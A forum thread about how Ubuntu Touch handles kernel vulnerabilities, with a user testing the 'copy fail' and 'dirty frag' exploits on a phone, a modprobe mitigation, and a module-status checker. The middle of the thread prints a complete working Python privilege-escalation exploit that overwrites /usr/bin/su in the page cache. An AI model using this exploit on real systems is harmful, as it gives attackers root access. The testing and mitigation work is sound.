UT kernel security question
-
Hello,
hopefully I am in the right section... I am just wondering how kernel security issues are handled in UT. Let's take as an example the last 2 (dirty frag and copy fail). Is it the responsibility of the maintainer(s) of the device to push a new kernel, or of some other group? How do I get such updates?
Thanks
-
@tidip If I'm not mistaken, it's not possible to exploit those vulnerabilities on Ubuntu Touch since there's only one user.
-
it all depends on the kernel, that is, on the specific port.
Here is what the 2 exploits you are referring to give on my Fairphone 5 running UT 24.04-1.3:
phablet@ubuntu-phablet:~$ python3 copyfail.py
Traceback (most recent call last):
  File "/home/phablet/copyfail.py", line 9, in <module>
    while i<len(e):c(f,i,e[i:i+4]);i+=4
                   ^^^^^^^^^^^^^^^
  File "/home/phablet/copyfail.py", line 5, in c
    a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
    ^^^^^^^^^^^^^^^^
  File "/usr/lib/python3.12/socket.py", line 233, in __init__
    _socket.socket.__init__(self, family, type, proto, fileno)
OSError: [Errno 97] Address family not supported by protocol
phablet@ubuntu-phablet:~$ cd Downloads/
phablet@ubuntu-phablet:~/Downloads$ gcc -O0 -Wall -o exp exp.c -lutil
phablet@ubuntu-phablet:~/Downloads$ ./exp
/usr/bin/su: 1: ELF: not found
/usr/bin/su: 1: cannot open : No such file
/usr/bin/su: 1: cannot open {�(��4[O+1� �z�~��]�5��m���l<����������E]�����E- ���Hp�: No such file
/usr/bin/su: 4: F�1� ���*F�B1� ���.F�b1� ���2F��1� ���6F��1� ���:F��1� ���>F��1� ���BF�2� ���FF�2�: not found
/usr/bin/su: 5: Syntax error: ")" unexpected
phablet@ubuntu-phablet:~/Downloads$

In short, no root shell, so not vulnerable without any mitigation. Don't ask me why, I don't know.
To anyone wanting to run this code: the dirtyfrag exploit can be had here
The python code to test the copyfail vuln is here:
#!/usr/bin/env python3
import os as g,zlib,socket as s
def d(x):return bytes.fromhex(x)
def c(f,t,c):
 a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
 try:u.recv(8+t)
 except:0
f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):c(f,i,e[i:i+4]);i+=4

@bolly: getting root access from software running as phablet allows the code to install system services, remount the root r/w and as such is preferably avoided.
-
@gpatel-fr
the second one looks like it successfully wrote something to su and tried to run it, but the su contents were misunderstood by the OS.
The mitigation should be the same as for desktop Linux: disabling the affected modules completely in the modprobe config:

install esp4 /bin/false
install esp6 /bin/false
install rxrpc /bin/false
install algif_aead /bin/false
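Added example (not from this thread) to check whether that modprobe mitigation actually takes effect on a given port; it assumes the usual /proc/modules, /lib/modules/<release>/modules.builtin and /etc/modprobe.d locations. An install line only stops future autoloading, so a module that is already loaded or built into the kernel is reported separately from a blocked one.

```python
#!/usr/bin/env python3
# Added example (not from the thread). An 'install <mod> /bin/false' line only stops future
# autoloading; an already loaded or built-in module is unaffected, and is reported as such.
import glob, os, re

MODULES = ["esp4", "esp6", "rxrpc", "algif_aead"]

def builtin_modules(modules_builtin_text):
    # modules.builtin lists paths such as kernel/crypto/algif_aead.ko
    return {re.sub(r"\.ko$", "", os.path.basename(p)).replace("-", "_")
            for p in modules_builtin_text.split()}

def modprobe_overrides(modprobe_conf_text):
    # 'install <mod> <cmd>' and 'blacklist <mod>' directives, comments ignored
    overrides = {}
    for ln in modprobe_conf_text.splitlines():
        m = re.match(r"(install|blacklist)\s+(\S+)", ln.split("#", 1)[0].strip())
        if m:
            overrides.setdefault(m.group(2).replace("-", "_"), set()).add(m.group(1))
    return overrides

def assess(modules, proc_modules_text, modules_builtin_text, modprobe_conf_text):
    # /proc/modules has one line per loaded module, name first
    loaded = {ln.split()[0] for ln in proc_modules_text.splitlines() if ln.strip()}
    builtin = builtin_modules(modules_builtin_text)
    over, status = modprobe_overrides(modprobe_conf_text), {}
    for name in modules:
        if name in builtin:
            status[name] = "built-in"          # only a kernel rebuild removes it
        elif name in loaded:
            status[name] = "loaded"            # unload or reboot before the line bites
        elif "install" in over.get(name, ()):
            status[name] = "blocked"
        elif "blacklist" in over.get(name, ()):
            status[name] = "blacklisted-only"  # stops alias autoload, not explicit loads
        else:
            status[name] = "autoloadable"
    return status

# Constructed sample state (not from any real device), also used by the self-test.
SAMPLE_PROC = "esp4 28672 0 - Live 0x0000000000000000\nxfrm_algo 16384 1 esp4, Live 0x0\n"
SAMPLE_BUILTIN = "kernel/crypto/algif_aead.ko\nkernel/fs/ext4/ext4.ko\n"
SAMPLE_CONF = "install esp6 /bin/false\nblacklist rxrpc\n# install algif_aead /bin/false\n"
def slurp(path):  # missing files (e.g. no modules.builtin on this device) read as empty
    try: return open(path).read()
    except OSError: return ""
if __name__ == "__main__":  # live check of the running kernel
    live = (slurp("/proc/modules"), slurp(f"/lib/modules/{os.uname().release}/modules.builtin"),
            "".join(slurp(p) + "\n" for p in glob.glob("/etc/modprobe.d/*.conf")))
    for name, state in assess(MODULES, *live).items(): print(f"{name:12s}{state}")
```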